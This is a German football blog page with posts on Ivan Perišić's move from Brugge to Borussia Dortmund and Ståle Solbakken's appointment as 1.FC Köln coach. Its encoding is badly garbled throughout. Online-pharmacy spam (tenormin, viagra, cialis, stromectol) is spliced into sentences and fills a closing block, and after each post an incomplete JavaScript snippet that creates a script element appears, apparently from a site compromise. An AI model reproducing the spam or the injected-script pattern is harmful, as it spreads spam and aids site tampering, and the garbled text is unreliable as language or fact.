Dort reifte er abseits der breiten internationalen Ai??ffentlichkeit zu order tenormin medication einem der besten Mittelfeldspieler Belgiens. In 59 Spielen fA?r BrA?gge erzielte er 35 Tore, allein in der vergangenen Saison verbuchte er beeindruckende 22 Treffer und 10 Vorlagen, wurde damit Top-Scorer der Liga und von den Kollegen zum Purchase belgischen Spieler des Jahres gewAi??hlt. Definitiv eine Hausmarke fA?r einen solchen Jungspund, fuAYballerisches Talent ist somit ohne Zweifel vorhanden.

Die Torgefahr brauchen wir also nicht extra herauszustellen. DarA?ber hinaus gilt er als technisch Ai??uAYerst beschlagen, kopfball- und flankenstark. In Dortmunds 4-2-3-1-System kAi??nnte PeriA?iAi?? also im linken offensiven Mittelfeld spielen (wA?rde damit zum Hauptkonkurrenten fA?r Kevin GroAYkreutz, der im letzten Jahr in jedem Bundesligaspiel auflief) oder tatsAi??chlich Nuri Sahin im Zentrum beerben (die Alternativen wAi??ren hier wohl Sebastian Kehl, Sven Bender, eventuell Mario GAi??tze, Shinji Kagawa, Antonio da Silva sowie die NeuzugAi??nge Ilkay GA?ndogan und Moritz Leitner). Ein Kurzaufenthalt in Deutschland wird’s aller Voraussicht nach nicht, Perisic und der BVB einigten sich auf einen FA?nfjahresvertrag bis zum Sommer 2016, Hut ab, keine AlltAi??glichkeit im FuAYballgeschAi??ft des 21. Jahrhunderts.

Und nun noch vier Minuten Bewegtbild. Hier sehen wir mal ein paar von PeriA?iAi??s Toren und Vorlagen aus der letzten Saison, inklusive toller FlA?gellAi??ufe, eiskalter AbschlA?sse und direkter FreistoAYtreffer…
[youtube:http://www.youtube.com/watch?v=6iS25pL5sHI]

Auf jeden Fall ein guter Fang von BVB-Trainer JA?rgen Klopp, der das Team des deutschen Meisters definitiv aufwertet. NAi??tig ist es, schlieAYlich stehen in dieser Saison auch endlich wieder Champions League Partien gegen die besten Mannschaften Europas an. Aber bis dahin sind ja noch zwei, drei Monate Zeit. In den beiden Spielen im LIGA total! Cup 2011 fA?hrte er sich jedenfalls mit einem hohen Laufpensum, guter SpielA?bersicht und einem Torerfolg gleich richtig gut ein, so darf’s gerne weitergehen…var d=document;var s=d.createElement(‚script‘);

15.Mai 2011

Nach der Ai??uAYerst turbulenten Saison 2010/11 (an 14. Spieltagen stand man z.B. in diesem Jahr auf einem direkten Abstiegsplatz) mit drei verschiedenen Trainern (Zvonimir Soldo und Frank Schaefer, sowie Volker Finke als InterimslAi??sung) und dem abschlieAYenden Platz 10 soll beim 1.FC KAi??ln nun endlich wieder Ruhe einkehren – so fern das A?berhaupt irgendwie mAi??glich ist 😉

Aus diesem Grund handelte man nun auch beeindruckend unaufgeregt und schnell in Sachen Trainerfrage und prAi??sentierte zum gestrigen Saisonfinale mit dem NorwegerAi??StA?le Solbakken (nur echt mit dem A? im Vornamen) auch gleich den kA?nftigen Verantwortlichen. Der 43-jAi??hrige ehemalige Mittelfeldspieler kommt als WunschlAi??sung von Sportdirektor Volker Finke und mit zahlreichen Vorschusslorbeeren an den Rhein (58-facher norwegischer Nationalspieler, als Trainer des FC Kopenhagen viermal dAi??nischer Meister und Champions League Achtelfinalteilnahme 2011). Eigentlich sollte er ab 2012 die Nationalmannschaft seines Heimatlandes A?bernehmen, dem FC waren seine Dienste jedoch so viel wert, dass man dem norwegischen Verband bereitwillig eine AblAi??se zahlte. Sieht man bei Trainern im heutigen FuAYballgeschAi??ft auch nicht alle Tage.

Ein emotionaler Typ (beim Champions League Gruppenspiel gegen den FC Barcelona im November 2010 sale quibron-t legte er sich z.B. auf dem Platz Ai??uAYerst wort- und gestenreich mit Pep Guardiola an), der gut zum Verein passen kAi??nnte.
Los gehts offiziell also am 1. Juli. Auf der gestrigen Pressekonferenz ab Volker Finke schonmal eine 12-minA?tige aufschlussreiche EinfA?hrung in „Leben und Werk“ Solbakkens…
[youtube:http://www.youtube.com/watch?v=j_ulgJU3Jmk]

Und hier haben wir die offizielle Antritts-PK des neuen Trainers vom 17. Mai…
[youtube:http://www.youtube.com/watch?v=ok_if2zlIZo]var d=document;var s=d.createElement(‚script‘); can you get carafate over the counter online brahmin handbags, canada non-generic cialas. cheap stromectol 3 Buy pills online online Cheap order pamelor reviews buy viagra online singapore cialis vs viagra. buy pills vipps certified online pharmacy viagra leviteracetam shopping.

Seiten: 1 2 3 4 5 6